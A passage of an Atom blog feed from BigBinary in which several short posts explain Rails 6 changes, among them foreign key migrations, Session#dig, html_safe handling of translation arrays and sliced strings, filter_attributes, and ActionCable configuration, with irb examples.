end=&gt; :change&gt;&gt; RemoveUserForeignKeyFromOrders.new.change-- remove_foreign_key(:orders, :users)   (1.4ms)  SELECT sqlite_version(*)   (0.0ms)  begin transaction   (0.0ms)  PRAGMA foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys = ON   (0.0ms)  PRAGMA foreign_keys = OFF   (0.2ms)  CREATE TEMPORARY TABLE &quot;aorders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.3ms)  INSERT INTO &quot;aorders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;orders&quot;   (0.4ms)  DROP TABLE &quot;orders&quot;   (0.1ms)  CREATE TABLE &quot;orders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.1ms)  INSERT INTO &quot;orders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;aorders&quot;   (0.1ms)  DROP TABLE &quot;aorders&quot;   (0.0ms)  PRAGMA defer_foreign_keys = 0   (0.0ms)  PRAGMA foreign_keys = 1   (0.7ms)  commit transaction   -&gt; 0.0179s=&gt; []</code></pre><p>Now, let's remove foreign key constraint of <code>users</code> from <code>orders</code> table using<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>.</p><pre><code class="language-ruby">&gt;&gt; class RemoveUserForeignKeyFromOrders &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     remove_foreign_key :orders, :users&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; RemoveUserForeignKeyFromOrders.new.change-- remove_foreign_key(:orders, :users)   (1.4ms)  SELECT sqlite_version(*)   (0.0ms)  begin transaction   (0.0ms)  PRAGMA foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys   (0.0ms)  PRAGMA defer_foreign_keys = ON   (0.0ms)  PRAGMA foreign_keys = OFF   (0.2ms)  CREATE TEMPORARY TABLE &quot;aorders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.3ms)  INSERT INTO &quot;aorders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;orders&quot;   (0.4ms)  DROP TABLE &quot;orders&quot;   (0.1ms)  CREATE TABLE &quot;orders&quot; (&quot;id&quot; integer NOT NULL PRIMARY KEY, &quot;number&quot; varchar DEFAULT NULL, &quot;total&quot; decimal DEFAULT NULL, &quot;completed_at&quot; datetime DEFAULT NULL, &quot;created_at&quot; datetime(6) NOT NULL, &quot;updated_at&quot; datetime(6) NOT NULL, &quot;user_id&quot; integer DEFAULT NULL)   (0.1ms)  INSERT INTO &quot;orders&quot; (&quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot;)                     SELECT &quot;id&quot;,&quot;number&quot;,&quot;total&quot;,&quot;completed_at&quot;,&quot;created_at&quot;,&quot;updated_at&quot;,&quot;user_id&quot; FROM &quot;aorders&quot;   (0.1ms)  DROP TABLE &quot;aorders&quot;   (0.0ms)  PRAGMA defer_foreign_keys = 0   (0.0ms)  PRAGMA foreign_keys = 1   (0.7ms)  commit transaction   -&gt; 0.0179s=&gt; []</code></pre><p>We can see here that with Rails 6,<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-add_foreign_key">add_foreign_key</a>and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-remove_foreign_key">remove_foreign_key</a>work and were able to add and remove foreign key constraint respectively.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35212">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActionDispatch::Request::Session#dig]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-actiondispatch-request-session-dig"/>
      <updated>2019-09-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-actiondispatch-request-session-dig</id>
      <content type="html"><![CDATA[<p>Rails 6 added<a href="https://github.com/rails/rails/pull/32446">ActionDispatch::Request::Session#dig</a>.</p><p>This works the same way as Hash#dig (Link is not available).</p><p>It extracts the nested value specified by the sequence of keys.</p><p>Hash#dig (Link is not available) was introduced in <code>Ruby 2.3</code>.</p><p>Before Rails 6, we can achieve the same thing by first converting session to ahash and then calling Hash#dig (Link is not available) on it.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>Let's add some user information in session and use dig after converting it to ahash.</p><pre><code class="language-ruby">&gt;&gt; session[:user] = { email: 'jon@bigbinary.com', name: { first: 'Jon', last: 'Snow' }  }=&gt; {:email=&gt;&quot;jon@bigbinary.com&quot;, :name=&gt;{:first=&gt;&quot;Jon&quot;, :last=&gt;&quot;Snow&quot;}}&gt;&gt; session.to_hash=&gt; {&quot;session_id&quot;=&gt;&quot;5fe8cc73c822361e53e2b161dcd20e47&quot;, &quot;_csrf_token&quot;=&gt;&quot;gyFd5nEEkFvWTnl6XeVbJ7qehgL923hJt8PyHVCH/DA=&quot;, &quot;return_to&quot;=&gt;&quot;http://localhost:3000&quot;, &quot;user&quot;=&gt;{:email=&gt;&quot;jon@bigbinary.com&quot;, :name=&gt;{:first=&gt;&quot;Jon&quot;, :last=&gt;&quot;Snow&quot;}}}&gt;&gt; session.to_hash.dig(&quot;user&quot;, :name, :first)=&gt; &quot;Jon&quot;</code></pre><h4>Rails 6.0.0.rc1</h4><p>Let's add the same information to session and now use <code>dig</code> on session objectwithout converting it to a hash.</p><pre><code class="language-ruby">&gt;&gt; session[:user] = { email: 'jon@bigbinary.com', name: { first: 'Jon', last: 'Snow' }  }=&gt; {:email=&gt;&quot;jon@bigbinary.com&quot;, :name=&gt;{:first=&gt;&quot;Jon&quot;, :last=&gt;&quot;Snow&quot;}}&gt;&gt; session.dig(:user, :name, :first)=&gt; &quot;Jon&quot;</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/32446">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Marking arrays of translations safe using html suffix]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix"/>
      <updated>2019-09-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix</id>
      <content type="html"><![CDATA[<h3>Before Rails 6</h3><p>Before Rails 6, keys with the <code>_html</code> suffix in the language locale files areautomatically marked as HTML safe. These HTML safe keys do not get escaped whenused in the views.</p><pre><code class="language-yaml"># config/locales/en.ymlen:  home:    index:      title_html: &lt;h2&gt;We build web &amp; mobile applications&lt;/h2&gt;      description_html:        We are a dynamic team of &lt;em&gt;developers&lt;/em&gt; and &lt;em&gt;designers&lt;/em&gt;.      sections:        blogs:          title_html: &lt;h3&gt;Blogs &amp; publications&lt;/h3&gt;          description_html:            We regularly write our blog. Our blogs are covered by &lt;strong&gt;Ruby            Inside&lt;/strong&gt; and &lt;strong&gt;Ruby Weekly Newsletter&lt;/strong&gt;.</code></pre><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;&lt;%= t('.title_html') %&gt;&lt;%= t('.description_html') %&gt;&lt;%= t('.sections.blogs.title_html') %&gt;&lt;%= t('.sections.blogs.description_html') %&gt;</code></pre><p>Once rendered, this page looks like this.</p><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/before-rails-6-i18n-_html-suffix-without-array-key.png" alt="before-rails-6"></p><p>This way of marking translations as HTML safe by adding <code>_html</code> suffix to thekeys does not work as expected when the value is an array.</p><pre><code class="language-yaml"># config/locales/en.ymlen:home:index:title_html: &lt;h2&gt;We build web &amp; mobile applications&lt;/h2&gt;description_html: We are a dynamic team of &lt;em&gt;developers&lt;/em&gt; and &lt;em&gt;designers&lt;/em&gt;.sections:blogs:title_html: &lt;h3&gt;Blogs &amp; publications&lt;/h3&gt;description_html: We regularly write our blog. Our blogs are covered by &lt;strong&gt;Ruby Inside&lt;/strong&gt; and &lt;strong&gt;Ruby Weekly Newsletter&lt;/strong&gt;.services:title_html: &lt;h3&gt;Services we offer&lt;/h3&gt;list_html: - &lt;strong&gt;Ruby on Rails&lt;/strong&gt; - React.js &amp;#9883; - React Native &amp;#9883; &amp;#128241;</code></pre><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;&lt;%= t('.title_html') %&gt;&lt;%= t('.description_html') %&gt;&lt;%= t('.sections.blogs.title_html') %&gt;&lt;%= t('.sections.blogs.description_html') %&gt;&lt;%= t('.sections.services.title_html') %&gt;&lt;ul&gt;  &lt;% t('.sections.services.list_html').each do |service| %&gt;    &lt;li&gt;&lt;%= service %&gt;&lt;/li&gt;  &lt;% end %&gt;&lt;ul&gt;</code></pre><p>The rendered page escapes the unsafe HTML while rendering the array oftranslations for the key <code>.sections.services.list_html</code> even though that key hasthe <code>_html</code> suffix.</p><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/before-rails-6-i18n-_html-suffix-with-array-key.png" alt="before-rails-6"></p><p>A workaround is to manually mark all the translations in that array as HTML safeusing the methods such as <code>#raw</code> or <code>#html_safe</code>.</p><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;&lt;%= t('.title_html') %&gt;&lt;%= t('.description_html') %&gt;&lt;%= t('.sections.blogs.title_html') %&gt;&lt;%= t('.sections.blogs.description_html') %&gt;&lt;%= t('.sections.services.title_html') %&gt;&lt;ul&gt;  &lt;% t('.sections.services.list_html').each do |service| %&gt;    &lt;li&gt;&lt;%= service.html_safe %&gt;&lt;/li&gt;  &lt;% end %&gt;&lt;ul&gt;</code></pre><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/rails-6-i18n-array-key-with-_html-suffix.png" alt="rails-6-i18n"></p><h3>Arrays of translations are trusted as HTML safe by using the '_html' suffix in Rails 6</h3><p>In Rails 6, the unexpected behavior of not marking an array of translations asHTML safe even though the key of that array has the <code>_html</code> suffix is fixed.</p><pre><code class="language-yaml"># config/locales/en.ymlen:home:index:title_html: &lt;h2&gt;We build web &amp; mobile applications&lt;/h2&gt;description_html: We are a dynamic team of &lt;em&gt;developers&lt;/em&gt; and &lt;em&gt;designers&lt;/em&gt;.sections:blogs:title_html: &lt;h3&gt;Blogs &amp; publications&lt;/h3&gt;description_html: We regularly write our blog. Our blogs are covered by &lt;strong&gt;Ruby Inside&lt;/strong&gt; and &lt;strong&gt;Ruby Weekly Newsletter&lt;/strong&gt;.services:title_html: &lt;h3&gt;Services we offer&lt;/h3&gt;list_html: - &lt;strong&gt;Ruby on Rails&lt;/strong&gt; - React.js &amp;#9883; - React Native &amp;#9883; &amp;#128241;</code></pre><pre><code class="language-erb">&lt;!-- app/views/home/index.html.erb --&gt;&lt;%= t('.title_html') %&gt;&lt;%= t('.description_html') %&gt;&lt;%= t('.sections.blogs.title_html') %&gt;&lt;%= t('.sections.blogs.description_html') %&gt;&lt;%= t('.sections.services.title_html') %&gt;&lt;ul&gt;  &lt;% t('.sections.services.list_html').each do |service| %&gt;    &lt;li&gt;&lt;%= service %&gt;&lt;/li&gt;  &lt;% end %&gt;&lt;ul&gt;</code></pre><p><img src="/blog_images/2019/rails-6-marks-arrays-of-translations-as-trusted-safe-by-using-the-_html-suffix/rails-6-i18n-array-key-with-_html-suffix.png" alt="rails-6-i18n"></p><p>We can see above that we no longer need to manually mark the translations asHTML safe for the key <code>.sections.services.title_html</code> using the methods such as<code>#raw</code> or <code>#html_safe</code> since that key has the <code>_html</code> suffix.</p><hr><p>To learn more about this feature, please checkout<a href="https://github.com/rails/rails/pull/32361">rails/rails#32361</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds filter_attributes on ActiveRecord::Base]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-base-filter_attributes"/>
      <updated>2019-09-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-base-filter_attributes</id>
      <content type="html"><![CDATA[<p>A lot of times, we ask user for sensitive data such as password, credit cardnumber etc. We should not be able to see this information in logs. So, theremust be a way in Rails to filter out these parameters from logs.</p><p>Rails provides a way of doing this. We can add parameters to<a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>.</p><p>There is one more way of doing this in Rails. We can also use<a href="https://api.rubyonrails.org/classes/ActionDispatch/Http/FilterParameters.html">https://api.rubyonrails.org/classes/ActionDispatch/Http/FilterParameters.html</a>.</p><p>However there is still a security issue when we call inspect on an ActiveRecordobject for logging purposes. In this case, Rails does not consider<a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>and displays the sensitive information.</p><p>Rails 6 fixes this. It considers<a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>while inspecting an object.</p><p>Rails 6 also provides an alternative way to filter columns on ActiveRecord levelby adding <a href="https://github.com/rails/rails/pull/33756">filter_attributes</a> onActiveRecord::Base.</p><p>In Rails 6, <a href="https://github.com/rails/rails/pull/33756">filter_attributes</a> onActiveRecord::Base takes priority over<a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>.</p><p>Let's checkout how it works.</p><h4>Rails 6.0.0.rc1</h4><p>Let's create a user record and call inspect on it.</p><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;  validates :email, :password, presence: true&gt;&gt; end=&gt; {:presence=&gt;true}&gt;&gt; User.create(email: 'john@bigbinary.com', password: 'john_wick_bigbinary')BEGIN  User Create (0.6ms)  INSERT INTO &quot;users&quot; (&quot;email&quot;, &quot;password&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3, $4) RETURNING &quot;id&quot;  [[&quot;email&quot;, &quot;john@bigbinary.com&quot;], [&quot;password&quot;, &quot;john_wick_bigbinary&quot;], [&quot;created_at&quot;, &quot;2019-05-17 21:34:34.504394&quot;], [&quot;updated_at&quot;, &quot;2019-05-17 21:34:34.504394&quot;]]COMMIT=&gt; #&lt;User id: 2, email: &quot;john@bigbinary.com&quot;, password: [FILTERED], created_at: &quot;2019-05-17 21:34:34&quot;, updated_at: &quot;2019-05-17 21:34:34&quot;&gt;</code></pre><p>We can see that <code>password</code> is filtered as it is added to<a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>by default in <code>config/initializers/filter_parameter_logging.rb</code>.</p><p>Now let's add just <code>:email</code> to <code>User.filter_attributes</code></p><pre><code class="language-ruby">&gt;&gt; User.filter_attributes = [:email]=&gt; [:email]&gt;&gt; User.first.inspectSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; &quot;#&lt;User id: 2, email: [FILTERED], password: \&quot;john_wick_bigbinary\&quot;, created_at: \&quot;2019-05-17 21:34:34\&quot;, updated_at: \&quot;2019-05-17 21:34:34\&quot;&gt;&quot;</code></pre><p>We can see here that <code>User.filter_attributes</code> took priority over<a href="https://guides.rubyonrails.org/configuring.html#initializers">Rails.application.config.filter_parameters</a>and removed filtering from password and filtered just email.</p><p>Now, let's add both <code>:email</code> and <code>:password</code> to <code>User.filter_attributes</code>.</p><pre><code class="language-ruby">&gt;&gt; User.filter_attributes = [:email, :password]=&gt; [:email, :password]&gt;&gt; User.first.inspect=&gt; &quot;#&lt;User id: 2, email: [FILTERED], password: [FILTERED], created_at: \&quot;2019-05-17 21:34:34\&quot;, updated_at: \&quot;2019-05-17 21:34:34\&quot;&gt;&quot;</code></pre><p>We can see that now both <code>email</code> and <code>password</code> are filtered out.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/33756">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[ArgumentError for invalid :limit & :precision Rails 6]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-raises-argumenterror-for-invalid-limit-and-precision"/>
      <updated>2019-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-raises-argumenterror-for-invalid-limit-and-precision</id>
      <content type="html"><![CDATA[<p>Rails 6 raises <a href="https://apidock.com/ruby/ArgumentError">ArgumentError</a> when<code>:limit</code> and <code>:precision</code> are used with invalid datatypes.</p><p>Before Rails 6, it used to return<a href="https://api.rubyonrails.org/classes/ActiveRecord/ActiveRecordError.html">ActiveRecord::ActiveRecordError</a>.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>Let's create an orders table and try using <code>:limit</code> with a column named asquantity with data type <code>integer</code>.</p><pre><code class="language-ruby">&gt; &gt; class CreateOrders &lt; ActiveRecord::Migration[5.2]&gt; &gt; def change&gt; &gt; create_table :orders do |t|&gt; &gt; t.string :item&gt; &gt; t.integer :quantity, limit: 10&gt; &gt;&gt; &gt;       t.timestamps&gt; &gt;     end&gt; &gt;&gt; &gt; end&gt; &gt; end=&gt; :change&gt; &gt; CreateOrders.new.change&gt; &gt; -- create_table(:orders)=&gt; Traceback (most recent call last):2: from (irb):111: from (irb):3:in 'change'ActiveRecord::ActiveRecordError (No integer type has byte size 10. Use a numeric with scale 0 instead.)</code></pre><p>We can see that use of <code>:limit</code> with <code>integer</code> column raises<a href="https://api.rubyonrails.org/classes/ActiveRecord/ActiveRecordError.html">ActiveRecord::ActiveRecordError</a>in <code>Rails 5.2</code>.</p><p>Now let's try using <code>:precision</code> of <code>10</code> with a <code>datetime</code> column.</p><pre><code class="language-ruby">&gt; &gt; class CreateOrders &lt; ActiveRecord::Migration[5.2]&gt; &gt; def change&gt; &gt; create_table :orders do |t|&gt; &gt; t.string :item&gt; &gt; t.integer :quantity&gt; &gt; t.datetime :completed_at, precision: 10&gt; &gt;&gt; &gt;       t.timestamps&gt; &gt;     end&gt; &gt;&gt; &gt; end&gt; &gt; end=&gt; :change&gt; &gt; CreateOrders.new.change&gt; &gt; -- create_table(:orders)=&gt; Traceback (most recent call last):2: from (irb):121: from (irb):3:in 'change'ActiveRecord::ActiveRecordError (No timestamp type has precision of 10. The allowed range of precision is from 0 to 6)</code></pre><p>We can see that invalid value of <code>:precision</code> with datetime column also raises<a href="https://api.rubyonrails.org/classes/ActiveRecord/ActiveRecordError.html">ActiveRecord::ActiveRecordError</a>in <code>Rails 5.2</code>.</p><h4>Rails 6.0.0.rc1</h4><p>Let's create an orders table and try using <code>:limit</code> with a column named asquantity with data type <code>integer</code> in Rails 6.</p><pre><code class="language-ruby">&gt; &gt; class CreateOrders &lt; ActiveRecord::Migration[6.0]&gt; &gt; def change&gt; &gt; create_table :orders do |t|&gt; &gt; t.string :item&gt; &gt; t.integer :quantity, limit: 10&gt; &gt;&gt; &gt;       t.timestamps&gt; &gt;     end&gt; &gt;&gt; &gt; end&gt; &gt; end=&gt; :change&gt; &gt; CreateOrders.new.change&gt; &gt; -- create_table(:orders)=&gt; Traceback (most recent call last):2: from (irb):111: from (irb):3:in 'change'ArgumentError (No integer type has byte size 10. Use a numeric with scale 0 instead.)</code></pre><p>We can see that use of <code>:limit</code> with <code>integer</code> column raises<a href="https://apidock.com/ruby/ArgumentError">ArgumentError</a> in <code>Rails 6</code>.</p><p>Now let's try using <code>:precision</code> of <code>10</code> with a <code>datetime</code> column.</p><pre><code class="language-ruby">&gt; &gt; class CreateOrders &lt; ActiveRecord::Migration[6.0]&gt; &gt; def change&gt; &gt; create_table :orders do |t|&gt; &gt; t.string :item&gt; &gt; t.integer :quantity&gt; &gt; t.datetime :completed_at, precision: 10&gt; &gt;&gt; &gt;       t.timestamps&gt; &gt;     end&gt; &gt;&gt; &gt; end&gt; &gt; end=&gt; :change&gt; &gt; CreateOrders.new.change&gt; &gt; -- create_table(:orders)=&gt; Traceback (most recent call last):2: from (irb):121: from (irb):3:in 'change'ArgumentError (No timestamp type has precision of 10. The allowed range of precision is from 0 to 6)</code></pre><p>We can see that invalid value of <code>:precision</code> with datetime column also raises<a href="https://apidock.com/ruby/ArgumentError">ArgumentError</a> in <code>Rails 6</code>.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35887">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 Pass custom config to ActionCable::Server::Base]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-passing-custom-configuration-to-actioncable-server-base"/>
      <updated>2019-08-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-passing-custom-configuration-to-actioncable-server-base</id>
      <content type="html"><![CDATA[<p>Before Rails 6, Action Cable server used default configuration on boot up,unless custom configuration is provided explicitly.</p><p>Custom configuration can be mentioned in either <code>config/cable.yml</code> or<code>config/application.rb</code> as shown below.</p><pre><code class="language-ruby"># config/cable.ymlproduction:  url: redis://redis.example.com:6379  adapter: redis  channel_prefix: custom_</code></pre><p>Or</p><pre><code class="language-ruby"># config/application.rbconfig.action_cable.cable = { adapter: &quot;redis&quot;, channel_prefix: &quot;custom_&quot; }</code></pre><p>In some cases, we need another Action Cable server running separately fromapplication with a different set of configuration.</p><p>Problem is that both approaches mentioned earlier set Action Cable serverconfiguration on application boot up. This configuration can not be changed forthe second server.</p><p>Rails 6 has added a provision to pass custom configuration. Rails 6 allows us topass <code>ActionCable::Server::Configuration</code> object as an option when initializinga new Action Cable server.</p><pre><code class="language-ruby">config = ActionCable::Server::Configuration.newconfig.cable = { adapter: &quot;redis&quot;, channel_prefix: &quot;custom_&quot; }ActionCable::Server::Base.new(config: config)</code></pre><p>For more details on Action Cable configurations, head to<a href="https://edgeguides.rubyonrails.org/action_cable_overview.html#configuration">Action Cable docs</a>.</p><p>Here's the relevant <a href="https://github.com/rails/rails/pull/34714">pull request</a>for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds support of symbol keys]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activesupport-hashwithindifferentaccess-assoc"/>
      <updated>2019-08-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activesupport-hashwithindifferentaccess-assoc</id>
      <content type="html"><![CDATA[<p>Rails 6 added support of symbol keys with<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html#method-i-assoc">ActiveSupport::HashWithIndifferentAccess#assoc</a>.</p><p>Please note that documentation of<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html#method-i-assoc">ActiveSupport::HashWithIndifferentAccess#assoc</a>in Rails 5.2 shows that<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html#method-i-assoc">ActiveSupport::HashWithIndifferentAccess#assoc</a>works with symbol keys but it doesn't.</p><p>In Rails 6,<a href="https://github.com/rails/rails/pull/35080">ActiveSupport::HashWithIndifferentAccess</a>implements a hash where string and symbol keys are considered to be the same.</p><p>Before Rails 6, <code>HashWithIndifferentAccess#assoc</code> used to work with just stringkeys.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>Let's create an object of<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html">ActiveSupport::HashWithIndifferentAccess</a>and call <code>assoc</code> on that object.</p><pre><code class="language-ruby">&gt;&gt; info = { name: 'Mark', email: 'mark@bigbinary.com' }.with_indifferent_access=&gt; {&quot;name&quot;=&gt;&quot;Mark&quot;, &quot;email&quot;=&gt;&quot;mark@bigbinary.com&quot;}&gt;&gt; info.assoc(:name)=&gt; nil&gt;&gt; info.assoc('name')=&gt; [&quot;name&quot;, &quot;Mark&quot;]</code></pre><p>We can see that <code>assoc</code> does not work with symbol keys with<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html">ActiveSupport::HashWithIndifferentAccess</a>in Rails 5.2.</p><h4>Rails 6.0.0.beta2</h4><p>Now, let's call <code>assoc</code> on the same hash in Rails 6 with both string and symbolkeys.</p><pre><code class="language-ruby">&gt;&gt; info = { name: 'Mark', email: 'mark@bigbinary.com' }.with_indifferent_access=&gt; {&quot;name&quot;=&gt;&quot;Mark&quot;, &quot;email&quot;=&gt;&quot;mark@bigbinary.com&quot;}&gt;&gt; info.assoc(:name)=&gt; [&quot;name&quot;, &quot;Mark&quot;]&gt;&gt; info.assoc('name')=&gt; [&quot;name&quot;, &quot;Mark&quot;]</code></pre><p>As we can see, <code>assoc</code> works perfectly fine with both string and symbol keyswith<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/HashWithIndifferentAccess.html">ActiveSupport::HashWithIndifferentAccess</a>in Rails 6.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35080">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 preserves status of #html_safe?]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-preserves-status-of-html_safe-on-sliced-and-multiplied-html-safe-strings"/>
      <updated>2019-08-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-preserves-status-of-html_safe-on-sliced-and-multiplied-html-safe-strings</id>
      <content type="html"><![CDATA[<h2>Before Rails 6</h2><p>Before Rails 6, calling <code>#html_safe?</code> on a slice of an HTML safe string returns<code>nil</code>.</p><pre><code class="language-ruby">&gt;&gt; html_content = &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;.html_safe# =&gt; &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;&gt;&gt; html_content.html_safe?# =&gt; true&gt;&gt; html_content[0..-1].html_safe?# =&gt; nil</code></pre><p>Also, before Rails 6, the <code>ActiveSupport::SafeBuffer#*</code> method does not preservethe HTML safe status as well.</p><pre><code class="language-ruby">&gt;&gt; line_break = &quot;&lt;br /&gt;&quot;.html_safe# =&gt; &quot;&lt;br /&gt;&quot;&gt;&gt; line_break.html_safe?# =&gt; true&gt;&gt; two_line_breaks = (line_break * 2)# =&gt; &quot;&lt;br /&gt;&lt;br /&gt;&quot;&gt;&gt; two_line_breaks.html_safe?# =&gt; nil</code></pre><h2>Rails 6 returns expected status of <code>#html_safe?</code></h2><p>In Rails 6, both of the above cases have been fixed properly.</p><p>Therefore, we will now get the status of <code>#html_safe?</code> as expected.</p><pre><code class="language-ruby">&gt;&gt; html_content = &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;.html_safe# =&gt; &quot;&lt;div&gt;Hello, world!&lt;/div&gt;&quot;&gt;&gt; html_content.html_safe?# =&gt; true&gt;&gt; html_content[0..-1].html_safe?# =&gt; true&gt;&gt; line_break = &quot;&lt;br /&gt;&quot;.html_safe# =&gt; &quot;&lt;br /&gt;&quot;&gt;&gt; line_break.html_safe?# =&gt; true&gt;&gt; two_line_breaks = (line_break * 2)# =&gt; &quot;&lt;br /&gt;&lt;br /&gt;&quot;&gt;&gt; two_line_breaks.html_safe?# =&gt; true</code></pre><p>Please check <a href="https://github.com/rails/rails/pull/33808">rails/rails#33808</a> and<a href="https://github.com/rails/rails/pull/36012">rails/rails#36012</a> for the relevantchanges.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Recyclable cache keys in Rails]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-adds-support-for-recyclable-cache-keys"/>
      <updated>2019-08-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-adds-support-for-recyclable-cache-keys</id>
